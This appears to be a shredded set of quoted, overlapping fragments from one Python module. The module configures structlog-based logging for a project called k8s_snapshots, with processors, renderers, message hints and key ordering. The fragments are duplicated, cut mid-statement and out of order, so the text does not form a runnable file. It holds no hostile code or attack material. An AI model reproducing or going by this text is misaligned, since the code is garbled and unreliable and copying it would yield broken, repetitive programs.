"structlog.stdlib.add_logger_name, structlog.stdlib.add_log_level, rename_level_to_severity, timestamper, structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, add_func_name, add_message, order_keys(key_order), structlog.stdlib.ProcessorFormatter.wrap_for_formatter, ] if for_humans:",
"'logging.StreamHandler', 'stream': sys.stdout, 'formatter': 'structlog', }, }, 'loggers': { '': { 'handlers': ['default'],",
"configure_from_config(config): configure_logging( level_name=config['log_level'], for_humans=not config['json_log'], json_indent=config['structlog_json_indent'] or None, ) def configure_logging( level_name: str='INFO',",
"'structlog': { '()': structlog.stdlib.ProcessorFormatter, 'processor': renderer, 'foreign_pre_chain': foreign_pre_chain, }, }, 'handlers': { 'default':",
"event = event_dict.get('event') if event is not None and 'message' not in event_dict:",
"event_dict['message'] = event event_dict['event'] = 'foreign' return event_dict def rename_level_to_severity(logger, method_name, event_dict): level",
"def from_key_hints(ed) -> List[str]: key_hints = ed.pop('key_hints', None) if key_hints is None: return",
"last=False) return event_dict return processor def event_enum_to_str(logger, method_name, event_dict): from k8s_snapshots import events",
"event_dict.get('message') is None: event_dict['message'] = event_dict.get('event') return event_dict prefix = event_dict['event'] hint =",
"record is None: return event_dict event_dict['function'] = record.funcName return event_dict def order_keys(order): \"\"\"",
"= structlog.processors.JSONRenderer( indent=indent, serializer=serialize.dumps ) foreign_pre_chain = [ # Add the log level",
"event_dict['event'] = 'foreign' return event_dict def rename_level_to_severity(logger, method_name, event_dict): level = event_dict.pop('level', None)",
"if for_humans: renderer = structlog.dev.ConsoleRenderer() # <=== else: # Make it so that",
"event event_dict['event'] = 'foreign' return event_dict def rename_level_to_severity(logger, method_name, event_dict): level = event_dict.pop('level',",
"ProcessStructuredErrors: def __init__(self): pass def __call__(self, logger, method_name, event_dict): exc_info = event_dict.pop('exc_info', None)",
"'.'-separated path of dictionary keys. ``hint`` : ``Optional[str]`` will be formatted using ``.format(**event_dict)``.",
"None indent = json_indent or None renderer = structlog.processors.JSONRenderer( indent=indent, serializer=serialize.dumps ) foreign_pre_chain",
"= event event_dict['event'] = 'foreign' return event_dict def rename_level_to_severity(logger, method_name, event_dict): level =",
"not None: message = f'{prefix}: {message}, {hint}' else: message = f'{prefix}: {hint}' event_dict['message']",
"Dict import structlog import sys from k8s_snapshots import serialize class ProcessStructuredErrors: def __init__(self):",
"exc_type, exc, exc_tb = structlog.processors._figure_out_exc_info( exc_info) __structlog__ = getattr(exc, '__structlog__', None) if not",
"List[str]: key_hints = ed.pop('key_hints', None) if key_hints is None: return [] return [",
"event_dict for key in reversed(order): if key in event_dict: event_dict.move_to_end(key, last=False) return event_dict",
"path of dictionary keys. ``hint`` : ``Optional[str]`` will be formatted using ``.format(**event_dict)``. \"\"\"",
"root_logger_level, 'propagate': True, }, 'k8s_snapshots': { 'level': 'DEBUG', } } } logging.config.dictConfig(logging_config) structlog.configure(",
"None: message = f'{prefix}: {message}, {hint}' else: message = f'{prefix}: {hint}' event_dict['message'] =",
"message = f'{prefix}: {message}, {hint}' else: message = f'{prefix}: {hint}' event_dict['message'] = message",
"event_dict def configure_from_config(config): configure_logging( level_name=config['log_level'], for_humans=not config['json_log'], json_indent=config['structlog_json_indent'] or None, ) def configure_logging(",
"event_dict def rename_level_to_severity(logger, method_name, event_dict): level = event_dict.pop('level', None) event_dict['severity'] = level.upper() return",
"isinstance(event_dict, OrderedDict): return event_dict for key in reversed(order): if key in event_dict: event_dict.move_to_end(key,",
"event_dict.get('event') if event is None: return event_dict if isinstance(event, events.EventEnum): event_dict['event'] = event.value",
"json_indent or None renderer = structlog.processors.JSONRenderer( indent=indent, serializer=serialize.dumps ) foreign_pre_chain = [ #",
"'default': { 'level': level_name, 'class': 'logging.StreamHandler', 'stream': sys.stdout, 'formatter': 'structlog', }, }, 'loggers':",
"key_hint)) for key_hint in key_hints ] def format_kv(key: str, value: Any) -> str:",
"ed.pop('key_hints', None) if key_hints is None: return [] return [ format_kv(key_hint, path_value(ed, key_hint))",
"add_func_name(logger, method_rame, event_dict): record = event_dict.get('_record') if record is None: return event_dict event_dict['function']",
"foreign_event_to_message, rename_level_to_severity, timestamper, ] if level_name == 'DEBUG': root_logger_level = 'DEBUG' else: root_logger_level",
"event_dict.pop('exc_info', None) if exc_info is None: return event_dict exc_type, exc, exc_tb = structlog.processors._figure_out_exc_info(",
"event_dict): exc_info = event_dict.pop('exc_info', None) if exc_info is None: return event_dict exc_type, exc,",
"None) if exc_info is None: return event_dict exc_type, exc, exc_tb = structlog.processors._figure_out_exc_info( exc_info)",
"None) if not callable(__structlog__): event_dict['exc_info'] = exc_info return event_dict structured_error = __structlog__() event_dict['structured_error']",
"= event_dict.pop('exc_info', None) if exc_info is None: return event_dict exc_type, exc, exc_tb =",
"'level'] timestamper = structlog.processors.TimeStamper(fmt='ISO') processors = [ event_enum_to_str, ProcessStructuredErrors(), structlog.stdlib.add_logger_name, structlog.stdlib.add_log_level, rename_level_to_severity, timestamper,",
"renderer = structlog.processors.JSONRenderer( indent=indent, serializer=serialize.dumps ) foreign_pre_chain = [ # Add the log",
"context_class=OrderedDict, logger_factory=structlog.stdlib.LoggerFactory(), wrapper_class=structlog.stdlib.BoundLogger, cache_logger_on_first_use=True, ) def foreign_event_to_message(logger, method_name, event_dict): event = event_dict.get('event') if",
"None) if __structlog__ is not None: value = __structlog__() value = value.get(key) return",
"= level.upper() return event_dict def add_func_name(logger, method_rame, event_dict): record = event_dict.get('_record') if record",
"def order_keys(order): \"\"\" Order keys for JSON readability when not using json_log=True \"\"\"",
"the log entry # is not from structlog. structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, structlog.stdlib.add_log_level, structlog.stdlib.add_logger_name, foreign_event_to_message,",
"event_dict structured_error = __structlog__() event_dict['structured_error'] = structured_error return event_dict def add_message(logger, method_name, event_dict):",
"event_dict: event_dict['message'] = event event_dict['event'] = 'foreign' return event_dict def rename_level_to_severity(logger, method_name, event_dict):",
"def rename_level_to_severity(logger, method_name, event_dict): level = event_dict.pop('level', None) event_dict['severity'] = level.upper() return event_dict",
"\"\"\" Creates a ``message`` value based on the ``hint`` and ``key_hint`` keys. ``key_hint``",
"] def format_kv(key: str, value: Any) -> str: return f'{key}={serialize.process(value)}' hints = [",
"structlog.stdlib.add_logger_name, foreign_event_to_message, rename_level_to_severity, timestamper, ] if level_name == 'DEBUG': root_logger_level = 'DEBUG' else:",
"so that 0 ⇒ None indent = json_indent or None renderer = structlog.processors.JSONRenderer(",
"{ 'level': 'DEBUG', } } } logging.config.dictConfig(logging_config) structlog.configure( processors=processors, context_class=OrderedDict, logger_factory=structlog.stdlib.LoggerFactory(), wrapper_class=structlog.stdlib.BoundLogger, cache_logger_on_first_use=True,",
"} logging.config.dictConfig(logging_config) structlog.configure( processors=processors, context_class=OrderedDict, logger_factory=structlog.stdlib.LoggerFactory(), wrapper_class=structlog.stdlib.BoundLogger, cache_logger_on_first_use=True, ) def foreign_event_to_message(logger, method_name, event_dict):",
"'loggers': { '': { 'handlers': ['default'], 'level': root_logger_level, 'propagate': True, }, 'k8s_snapshots': {",
"List, Any, Dict import structlog import sys from k8s_snapshots import serialize class ProcessStructuredErrors:",
"= ed.pop('key_hints', None) if key_hints is None: return [] return [ format_kv(key_hint, path_value(ed,",
"if __structlog__ is not None: value = __structlog__() value = value.get(key) return value",
"level_name, 'class': 'logging.StreamHandler', 'stream': sys.stdout, 'formatter': 'structlog', }, }, 'loggers': { '': {",
"message: {exc!r}' def path_value(dict_: Dict[str, Any], key_path: str) -> Optional[Any]: value = dict_",
"str='INFO' ): key_order = ['message', 'event', 'level'] timestamper = structlog.processors.TimeStamper(fmt='ISO') processors = [",
"value) def from_key_hints(ed) -> List[str]: key_hints = ed.pop('key_hints', None) if key_hints is None:",
"'ERROR' logging_config = { 'version': 1, 'disable_existing_loggers': False, 'formatters': { 'structlog': { '()':",
"__call__(self, logger, method_name, event_dict): exc_info = event_dict.pop('exc_info', None) if exc_info is None: return",
"key_order = ['message', 'event', 'level'] timestamper = structlog.processors.TimeStamper(fmt='ISO') processors = [ event_enum_to_str, ProcessStructuredErrors(),",
"__structlog__ = getattr(value, '__structlog__', None) if __structlog__ is not None: value = __structlog__()",
"def from_key_hint(ed) -> Optional[str]: key_hint = ed.pop('key_hint', None) if key_hint is None: return",
"'DEBUG' else: root_logger_level = 'ERROR' logging_config = { 'version': 1, 'disable_existing_loggers': False, 'formatters':",
"if level_name == 'DEBUG': root_logger_level = 'DEBUG' else: root_logger_level = 'ERROR' logging_config =",
"else: root_logger_level = 'ERROR' logging_config = { 'version': 1, 'disable_existing_loggers': False, 'formatters': {",
"if record is None: return event_dict event_dict['function'] = record.funcName return event_dict def order_keys(order):",
"None: return event_dict event_dict['function'] = record.funcName return event_dict def order_keys(order): \"\"\" Order keys",
"'processor': renderer, 'foreign_pre_chain': foreign_pre_chain, }, }, 'handlers': { 'default': { 'level': level_name, 'class':",
"None: return value = path_value(ed, key_hint) return format_kv(key_hint, value) def from_key_hints(ed) -> List[str]:",
"event_dict exc_type, exc, exc_tb = structlog.processors._figure_out_exc_info( exc_info) __structlog__ = getattr(exc, '__structlog__', None) if",
"a '.'-separated path of dictionary keys. ``hint`` : ``Optional[str]`` will be formatted using",
"``key_hint`` : ``Optional[str]`` a '.'-separated path of dictionary keys. ``hint`` : ``Optional[str]`` will",
"Exception as exc: return f'! error formatting message: {exc!r}' def path_value(dict_: Dict[str, Any],",
"event_dict.get('event') return event_dict prefix = event_dict['event'] hint = ', '.join(hint for hint in",
"json_indent=json_indent, level_name=level_name, ) def configure_structlog( for_humans: bool=False, json_indent: Optional[int]=None, level_name: str='INFO' ): key_order",
"None) if hint is None: return try: return hint.format(**event_dict) except Exception as exc:",
"structlog import sys from k8s_snapshots import serialize class ProcessStructuredErrors: def __init__(self): pass def",
"if hint is not None) message = event_dict.get('message') if message is not None:",
"Optional[int]=None, ): configure_structlog( for_humans=for_humans, json_indent=json_indent, level_name=level_name, ) def configure_structlog( for_humans: bool=False, json_indent: Optional[int]=None,",
"not None) message = event_dict.get('message') if message is not None: message = f'{prefix}:",
"__structlog__() event_dict['structured_error'] = structured_error return event_dict def add_message(logger, method_name, event_dict): \"\"\" Creates a",
"for_humans=not config['json_log'], json_indent=config['structlog_json_indent'] or None, ) def configure_logging( level_name: str='INFO', for_humans: bool=False, json_indent:",
"key_hint = ed.pop('key_hint', None) if key_hint is None: return value = path_value(ed, key_hint)",
"None) event_dict['severity'] = level.upper() return event_dict def add_func_name(logger, method_rame, event_dict): record = event_dict.get('_record')",
"= { 'version': 1, 'disable_existing_loggers': False, 'formatters': { 'structlog': { '()': structlog.stdlib.ProcessorFormatter, 'processor':",
"= event_dict.get('event') if event is None: return event_dict if isinstance(event, events.EventEnum): event_dict['event'] =",
"keys. ``key_hint`` : ``Optional[str]`` a '.'-separated path of dictionary keys. ``hint`` : ``Optional[str]``",
"and 'message' not in event_dict: event_dict['message'] = event event_dict['event'] = 'foreign' return event_dict",
"= [ from_hint(event_dict), from_key_hint(event_dict) ] hints += from_key_hints(event_dict) if all(hint is None for",
"<=== else: # Make it so that 0 ⇒ None indent = json_indent",
"None: return event_dict exc_type, exc, exc_tb = structlog.processors._figure_out_exc_info( exc_info) __structlog__ = getattr(exc, '__structlog__',",
"\"\"\" def from_hint(ed): hint = event_dict.pop('hint', None) if hint is None: return try:",
"``key_hint`` keys. ``key_hint`` : ``Optional[str]`` a '.'-separated path of dictionary keys. ``hint`` :",
"f'! error formatting message: {exc!r}' def path_value(dict_: Dict[str, Any], key_path: str) -> Optional[Any]:",
"Any) -> str: return f'{key}={serialize.process(value)}' hints = [ from_hint(event_dict), from_key_hint(event_dict) ] hints +=",
"ProcessStructuredErrors(), structlog.stdlib.add_logger_name, structlog.stdlib.add_log_level, rename_level_to_severity, timestamper, structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, add_func_name, add_message, order_keys(key_order), structlog.stdlib.ProcessorFormatter.wrap_for_formatter, ] if",
"dict_ for key in key_path.split('.'): if value is None: return __structlog__ = getattr(value,",
"def processor(logger, method_name, event_dict): if not isinstance(event_dict, OrderedDict): return event_dict for key in",
"that 0 ⇒ None indent = json_indent or None renderer = structlog.processors.JSONRenderer( indent=indent,",
"JSON readability when not using json_log=True \"\"\" def processor(logger, method_name, event_dict): if not",
"'DEBUG', } } } logging.config.dictConfig(logging_config) structlog.configure( processors=processors, context_class=OrderedDict, logger_factory=structlog.stdlib.LoggerFactory(), wrapper_class=structlog.stdlib.BoundLogger, cache_logger_on_first_use=True, ) def",
"= 'ERROR' logging_config = { 'version': 1, 'disable_existing_loggers': False, 'formatters': { 'structlog': {",
"logging.config from collections import OrderedDict from typing import Optional, List, Any, Dict import",
"if hint is None: return try: return hint.format(**event_dict) except Exception as exc: return",
"key_hints ] def format_kv(key: str, value: Any) -> str: return f'{key}={serialize.process(value)}' hints =",
"event_dict def add_message(logger, method_name, event_dict): \"\"\" Creates a ``message`` value based on the",
": ``Optional[str]`` will be formatted using ``.format(**event_dict)``. \"\"\" def from_hint(ed): hint = event_dict.pop('hint',",
"'k8s_snapshots': { 'level': 'DEBUG', } } } logging.config.dictConfig(logging_config) structlog.configure( processors=processors, context_class=OrderedDict, logger_factory=structlog.stdlib.LoggerFactory(), wrapper_class=structlog.stdlib.BoundLogger,",
"foreign_pre_chain, }, }, 'handlers': { 'default': { 'level': level_name, 'class': 'logging.StreamHandler', 'stream': sys.stdout,",
"return event_dict prefix = event_dict['event'] hint = ', '.join(hint for hint in hints",
"for key in key_path.split('.'): if value is None: return __structlog__ = getattr(value, '__structlog__',",
"event_dict: event_dict.move_to_end(key, last=False) return event_dict return processor def event_enum_to_str(logger, method_name, event_dict): from k8s_snapshots",
"to the event_dict if the log entry # is not from structlog. structlog.processors.StackInfoRenderer(),",
"event is None: return event_dict if isinstance(event, events.EventEnum): event_dict['event'] = event.value return event_dict",
"of dictionary keys. ``hint`` : ``Optional[str]`` will be formatted using ``.format(**event_dict)``. \"\"\" def",
"value is None: return __structlog__ = getattr(value, '__structlog__', None) if __structlog__ is not",
"structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, add_func_name, add_message, order_keys(key_order), structlog.stdlib.ProcessorFormatter.wrap_for_formatter, ] if for_humans: renderer = structlog.dev.ConsoleRenderer() #",
"value based on the ``hint`` and ``key_hint`` keys. ``key_hint`` : ``Optional[str]`` a '.'-separated",
"from collections import OrderedDict from typing import Optional, List, Any, Dict import structlog",
"if key_hints is None: return [] return [ format_kv(key_hint, path_value(ed, key_hint)) for key_hint",
"from_key_hints(ed) -> List[str]: key_hints = ed.pop('key_hints', None) if key_hints is None: return []",
"{ '': { 'handlers': ['default'], 'level': root_logger_level, 'propagate': True, }, 'k8s_snapshots': { 'level':",
"entry # is not from structlog. structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, structlog.stdlib.add_log_level, structlog.stdlib.add_logger_name, foreign_event_to_message, rename_level_to_severity, timestamper,",
"for_humans: bool=False, json_indent: Optional[int]=None, ): configure_structlog( for_humans=for_humans, json_indent=json_indent, level_name=level_name, ) def configure_structlog( for_humans:",
"collections import OrderedDict from typing import Optional, List, Any, Dict import structlog import",
"logging import logging.config from collections import OrderedDict from typing import Optional, List, Any,",
"def add_message(logger, method_name, event_dict): \"\"\" Creates a ``message`` value based on the ``hint``",
"typing import Optional, List, Any, Dict import structlog import sys from k8s_snapshots import",
"return hint.format(**event_dict) except Exception as exc: return f'! error formatting message: {exc!r}' def",
"event_dict['exc_info'] = exc_info return event_dict structured_error = __structlog__() event_dict['structured_error'] = structured_error return event_dict",
"or None renderer = structlog.processors.JSONRenderer( indent=indent, serializer=serialize.dumps ) foreign_pre_chain = [ # Add",
"'version': 1, 'disable_existing_loggers': False, 'formatters': { 'structlog': { '()': structlog.stdlib.ProcessorFormatter, 'processor': renderer, 'foreign_pre_chain':",
"= structured_error return event_dict def add_message(logger, method_name, event_dict): \"\"\" Creates a ``message`` value",
"= __structlog__() value = value.get(key) return value def from_key_hint(ed) -> Optional[str]: key_hint =",
"'foreign' return event_dict def rename_level_to_severity(logger, method_name, event_dict): level = event_dict.pop('level', None) event_dict['severity'] =",
"from k8s_snapshots import serialize class ProcessStructuredErrors: def __init__(self): pass def __call__(self, logger, method_name,",
"reversed(order): if key in event_dict: event_dict.move_to_end(key, last=False) return event_dict return processor def event_enum_to_str(logger,",
"if event_dict.get('message') is None: event_dict['message'] = event_dict.get('event') return event_dict prefix = event_dict['event'] hint",
"except Exception as exc: return f'! error formatting message: {exc!r}' def path_value(dict_: Dict[str,",
"hints): if event_dict.get('message') is None: event_dict['message'] = event_dict.get('event') return event_dict prefix = event_dict['event']",
"formatted using ``.format(**event_dict)``. \"\"\" def from_hint(ed): hint = event_dict.pop('hint', None) if hint is",
"return __structlog__ = getattr(value, '__structlog__', None) if __structlog__ is not None: value =",
"= event_dict.get('event') return event_dict prefix = event_dict['event'] hint = ', '.join(hint for hint",
"return event_dict structured_error = __structlog__() event_dict['structured_error'] = structured_error return event_dict def add_message(logger, method_name,",
"return event_dict def add_func_name(logger, method_rame, event_dict): record = event_dict.get('_record') if record is None:",
"str) -> Optional[Any]: value = dict_ for key in key_path.split('.'): if value is",
"message = event_dict.get('message') if message is not None: message = f'{prefix}: {message}, {hint}'",
"'level': 'DEBUG', } } } logging.config.dictConfig(logging_config) structlog.configure( processors=processors, context_class=OrderedDict, logger_factory=structlog.stdlib.LoggerFactory(), wrapper_class=structlog.stdlib.BoundLogger, cache_logger_on_first_use=True, )",
"for hint in hints if hint is not None) message = event_dict.get('message') if",
"== 'DEBUG': root_logger_level = 'DEBUG' else: root_logger_level = 'ERROR' logging_config = { 'version':",
"False, 'formatters': { 'structlog': { '()': structlog.stdlib.ProcessorFormatter, 'processor': renderer, 'foreign_pre_chain': foreign_pre_chain, }, },",
"log level and a timestamp to the event_dict if the log entry #",
"= event_dict.pop('hint', None) if hint is None: return try: return hint.format(**event_dict) except Exception",
"def foreign_event_to_message(logger, method_name, event_dict): event = event_dict.get('event') if event is not None and",
"return event_dict event_dict['function'] = record.funcName return event_dict def order_keys(order): \"\"\" Order keys for",
"will be formatted using ``.format(**event_dict)``. \"\"\" def from_hint(ed): hint = event_dict.pop('hint', None) if",
"'level': level_name, 'class': 'logging.StreamHandler', 'stream': sys.stdout, 'formatter': 'structlog', }, }, 'loggers': { '':",
"return processor def event_enum_to_str(logger, method_name, event_dict): from k8s_snapshots import events event = event_dict.get('event')",
"= event_dict.pop('level', None) event_dict['severity'] = level.upper() return event_dict def add_func_name(logger, method_rame, event_dict): record",
"] if level_name == 'DEBUG': root_logger_level = 'DEBUG' else: root_logger_level = 'ERROR' logging_config",
"= structlog.processors._figure_out_exc_info( exc_info) __structlog__ = getattr(exc, '__structlog__', None) if not callable(__structlog__): event_dict['exc_info'] =",
"return event_dict def configure_from_config(config): configure_logging( level_name=config['log_level'], for_humans=not config['json_log'], json_indent=config['structlog_json_indent'] or None, ) def",
"if message is not None: message = f'{prefix}: {message}, {hint}' else: message =",
"message = f'{prefix}: {hint}' event_dict['message'] = message return event_dict def configure_from_config(config): configure_logging( level_name=config['log_level'],",
"method_name, event_dict): event = event_dict.get('event') if event is not None and 'message' not",
"timestamper = structlog.processors.TimeStamper(fmt='ISO') processors = [ event_enum_to_str, ProcessStructuredErrors(), structlog.stdlib.add_logger_name, structlog.stdlib.add_log_level, rename_level_to_severity, timestamper, structlog.processors.StackInfoRenderer(),",
"hint.format(**event_dict) except Exception as exc: return f'! error formatting message: {exc!r}' def path_value(dict_:",
"'.join(hint for hint in hints if hint is not None) message = event_dict.get('message')",
"= structlog.processors.TimeStamper(fmt='ISO') processors = [ event_enum_to_str, ProcessStructuredErrors(), structlog.stdlib.add_logger_name, structlog.stdlib.add_log_level, rename_level_to_severity, timestamper, structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info,",
"cache_logger_on_first_use=True, ) def foreign_event_to_message(logger, method_name, event_dict): event = event_dict.get('event') if event is not",
"rename_level_to_severity, timestamper, structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, add_func_name, add_message, order_keys(key_order), structlog.stdlib.ProcessorFormatter.wrap_for_formatter, ] if for_humans: renderer =",
"try: return hint.format(**event_dict) except Exception as exc: return f'! error formatting message: {exc!r}'",
"method_name, event_dict): exc_info = event_dict.pop('exc_info', None) if exc_info is None: return event_dict exc_type,",
"processor def event_enum_to_str(logger, method_name, event_dict): from k8s_snapshots import events event = event_dict.get('event') if",
"if not isinstance(event_dict, OrderedDict): return event_dict for key in reversed(order): if key in",
"return [] return [ format_kv(key_hint, path_value(ed, key_hint)) for key_hint in key_hints ] def",
"= value.get(key) return value def from_key_hint(ed) -> Optional[str]: key_hint = ed.pop('key_hint', None) if",
"= ', '.join(hint for hint in hints if hint is not None) message",
"return try: return hint.format(**event_dict) except Exception as exc: return f'! error formatting message:",
"value def from_key_hint(ed) -> Optional[str]: key_hint = ed.pop('key_hint', None) if key_hint is None:",
"'propagate': True, }, 'k8s_snapshots': { 'level': 'DEBUG', } } } logging.config.dictConfig(logging_config) structlog.configure( processors=processors,",
"event_dict.move_to_end(key, last=False) return event_dict return processor def event_enum_to_str(logger, method_name, event_dict): from k8s_snapshots import",
"__structlog__ is not None: value = __structlog__() value = value.get(key) return value def",
"def __init__(self): pass def __call__(self, logger, method_name, event_dict): exc_info = event_dict.pop('exc_info', None) if",
"event_dict.pop('level', None) event_dict['severity'] = level.upper() return event_dict def add_func_name(logger, method_rame, event_dict): record =",
"keys. ``hint`` : ``Optional[str]`` will be formatted using ``.format(**event_dict)``. \"\"\" def from_hint(ed): hint",
"if the log entry # is not from structlog. structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, structlog.stdlib.add_log_level, structlog.stdlib.add_logger_name,",
") def foreign_event_to_message(logger, method_name, event_dict): event = event_dict.get('event') if event is not None",
"__init__(self): pass def __call__(self, logger, method_name, event_dict): exc_info = event_dict.pop('exc_info', None) if exc_info",
"all(hint is None for hint in hints): if event_dict.get('message') is None: event_dict['message'] =",
"on the ``hint`` and ``key_hint`` keys. ``key_hint`` : ``Optional[str]`` a '.'-separated path of",
"['message', 'event', 'level'] timestamper = structlog.processors.TimeStamper(fmt='ISO') processors = [ event_enum_to_str, ProcessStructuredErrors(), structlog.stdlib.add_logger_name, structlog.stdlib.add_log_level,",
"level.upper() return event_dict def add_func_name(logger, method_rame, event_dict): record = event_dict.get('_record') if record is",
"# is not from structlog. structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, structlog.stdlib.add_log_level, structlog.stdlib.add_logger_name, foreign_event_to_message, rename_level_to_severity, timestamper, ]",
"is not None: message = f'{prefix}: {message}, {hint}' else: message = f'{prefix}: {hint}'",
"timestamper, ] if level_name == 'DEBUG': root_logger_level = 'DEBUG' else: root_logger_level = 'ERROR'",
"getattr(value, '__structlog__', None) if __structlog__ is not None: value = __structlog__() value =",
"# Make it so that 0 ⇒ None indent = json_indent or None",
"json_indent=config['structlog_json_indent'] or None, ) def configure_logging( level_name: str='INFO', for_humans: bool=False, json_indent: Optional[int]=None, ):",
"from k8s_snapshots import events event = event_dict.get('event') if event is None: return event_dict",
"using json_log=True \"\"\" def processor(logger, method_name, event_dict): if not isinstance(event_dict, OrderedDict): return event_dict",
"): key_order = ['message', 'event', 'level'] timestamper = structlog.processors.TimeStamper(fmt='ISO') processors = [ event_enum_to_str,",
"= getattr(exc, '__structlog__', None) if not callable(__structlog__): event_dict['exc_info'] = exc_info return event_dict structured_error",
"in hints if hint is not None) message = event_dict.get('message') if message is",
"else: # Make it so that 0 ⇒ None indent = json_indent or",
"is None: event_dict['message'] = event_dict.get('event') return event_dict prefix = event_dict['event'] hint = ',",
"event_dict): level = event_dict.pop('level', None) event_dict['severity'] = level.upper() return event_dict def add_func_name(logger, method_rame,",
"from_hint(ed): hint = event_dict.pop('hint', None) if hint is None: return try: return hint.format(**event_dict)",
"exc: return f'! error formatting message: {exc!r}' def path_value(dict_: Dict[str, Any], key_path: str)",
"structlog. structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, structlog.stdlib.add_log_level, structlog.stdlib.add_logger_name, foreign_event_to_message, rename_level_to_severity, timestamper, ] if level_name == 'DEBUG':",
"timestamper, structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, add_func_name, add_message, order_keys(key_order), structlog.stdlib.ProcessorFormatter.wrap_for_formatter, ] if for_humans: renderer = structlog.dev.ConsoleRenderer()",
"⇒ None indent = json_indent or None renderer = structlog.processors.JSONRenderer( indent=indent, serializer=serialize.dumps )",
"= [ # Add the log level and a timestamp to the event_dict",
"'formatters': { 'structlog': { '()': structlog.stdlib.ProcessorFormatter, 'processor': renderer, 'foreign_pre_chain': foreign_pre_chain, }, }, 'handlers':",
"import sys from k8s_snapshots import serialize class ProcessStructuredErrors: def __init__(self): pass def __call__(self,",
"level_name: str='INFO', for_humans: bool=False, json_indent: Optional[int]=None, ): configure_structlog( for_humans=for_humans, json_indent=json_indent, level_name=level_name, ) def",
"def path_value(dict_: Dict[str, Any], key_path: str) -> Optional[Any]: value = dict_ for key",
"in event_dict: event_dict.move_to_end(key, last=False) return event_dict return processor def event_enum_to_str(logger, method_name, event_dict): from",
"['default'], 'level': root_logger_level, 'propagate': True, }, 'k8s_snapshots': { 'level': 'DEBUG', } } }",
"structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, structlog.stdlib.add_log_level, structlog.stdlib.add_logger_name, foreign_event_to_message, rename_level_to_severity, timestamper, ] if level_name == 'DEBUG': root_logger_level",
"value = value.get(key) return value def from_key_hint(ed) -> Optional[str]: key_hint = ed.pop('key_hint', None)",
"structlog.processors.format_exc_info, structlog.stdlib.add_log_level, structlog.stdlib.add_logger_name, foreign_event_to_message, rename_level_to_severity, timestamper, ] if level_name == 'DEBUG': root_logger_level =",
"None) if key_hint is None: return value = path_value(ed, key_hint) return format_kv(key_hint, value)",
"keys for JSON readability when not using json_log=True \"\"\" def processor(logger, method_name, event_dict):",
"the ``hint`` and ``key_hint`` keys. ``key_hint`` : ``Optional[str]`` a '.'-separated path of dictionary",
"method_name, event_dict): level = event_dict.pop('level', None) event_dict['severity'] = level.upper() return event_dict def add_func_name(logger,",
"k8s_snapshots import events event = event_dict.get('event') if event is None: return event_dict if",
"'structlog', }, }, 'loggers': { '': { 'handlers': ['default'], 'level': root_logger_level, 'propagate': True,",
"f'{prefix}: {message}, {hint}' else: message = f'{prefix}: {hint}' event_dict['message'] = message return event_dict",
"return event_dict def rename_level_to_severity(logger, method_name, event_dict): level = event_dict.pop('level', None) event_dict['severity'] = level.upper()",
"= event_dict.get('message') if message is not None: message = f'{prefix}: {message}, {hint}' else:",
"from_key_hint(ed) -> Optional[str]: key_hint = ed.pop('key_hint', None) if key_hint is None: return value",
"# <=== else: # Make it so that 0 ⇒ None indent =",
"= message return event_dict def configure_from_config(config): configure_logging( level_name=config['log_level'], for_humans=not config['json_log'], json_indent=config['structlog_json_indent'] or None,",
"'DEBUG': root_logger_level = 'DEBUG' else: root_logger_level = 'ERROR' logging_config = { 'version': 1,",
"{ 'handlers': ['default'], 'level': root_logger_level, 'propagate': True, }, 'k8s_snapshots': { 'level': 'DEBUG', }",
"logger, method_name, event_dict): exc_info = event_dict.pop('exc_info', None) if exc_info is None: return event_dict",
"exc_info) __structlog__ = getattr(exc, '__structlog__', None) if not callable(__structlog__): event_dict['exc_info'] = exc_info return",
"a timestamp to the event_dict if the log entry # is not from",
"if value is None: return __structlog__ = getattr(value, '__structlog__', None) if __structlog__ is",
"{exc!r}' def path_value(dict_: Dict[str, Any], key_path: str) -> Optional[Any]: value = dict_ for",
"configure_structlog( for_humans=for_humans, json_indent=json_indent, level_name=level_name, ) def configure_structlog( for_humans: bool=False, json_indent: Optional[int]=None, level_name: str='INFO'",
"from_key_hint(event_dict) ] hints += from_key_hints(event_dict) if all(hint is None for hint in hints):",
"when not using json_log=True \"\"\" def processor(logger, method_name, event_dict): if not isinstance(event_dict, OrderedDict):",
"key_hints = ed.pop('key_hints', None) if key_hints is None: return [] return [ format_kv(key_hint,",
"k8s_snapshots import serialize class ProcessStructuredErrors: def __init__(self): pass def __call__(self, logger, method_name, event_dict):",
"from_hint(event_dict), from_key_hint(event_dict) ] hints += from_key_hints(event_dict) if all(hint is None for hint in",
"}, }, 'handlers': { 'default': { 'level': level_name, 'class': 'logging.StreamHandler', 'stream': sys.stdout, 'formatter':",
"message is not None: message = f'{prefix}: {message}, {hint}' else: message = f'{prefix}:",
"as exc: return f'! error formatting message: {exc!r}' def path_value(dict_: Dict[str, Any], key_path:",
"str, value: Any) -> str: return f'{key}={serialize.process(value)}' hints = [ from_hint(event_dict), from_key_hint(event_dict) ]",
"add_message(logger, method_name, event_dict): \"\"\" Creates a ``message`` value based on the ``hint`` and",
"= [ event_enum_to_str, ProcessStructuredErrors(), structlog.stdlib.add_logger_name, structlog.stdlib.add_log_level, rename_level_to_severity, timestamper, structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, add_func_name, add_message, order_keys(key_order),",
"= dict_ for key in key_path.split('.'): if value is None: return __structlog__ =",
"format_kv(key_hint, path_value(ed, key_hint)) for key_hint in key_hints ] def format_kv(key: str, value: Any)",
"formatting message: {exc!r}' def path_value(dict_: Dict[str, Any], key_path: str) -> Optional[Any]: value =",
"hint in hints): if event_dict.get('message') is None: event_dict['message'] = event_dict.get('event') return event_dict prefix",
"renderer, 'foreign_pre_chain': foreign_pre_chain, }, }, 'handlers': { 'default': { 'level': level_name, 'class': 'logging.StreamHandler',",
"event_dict return processor def event_enum_to_str(logger, method_name, event_dict): from k8s_snapshots import events event =",
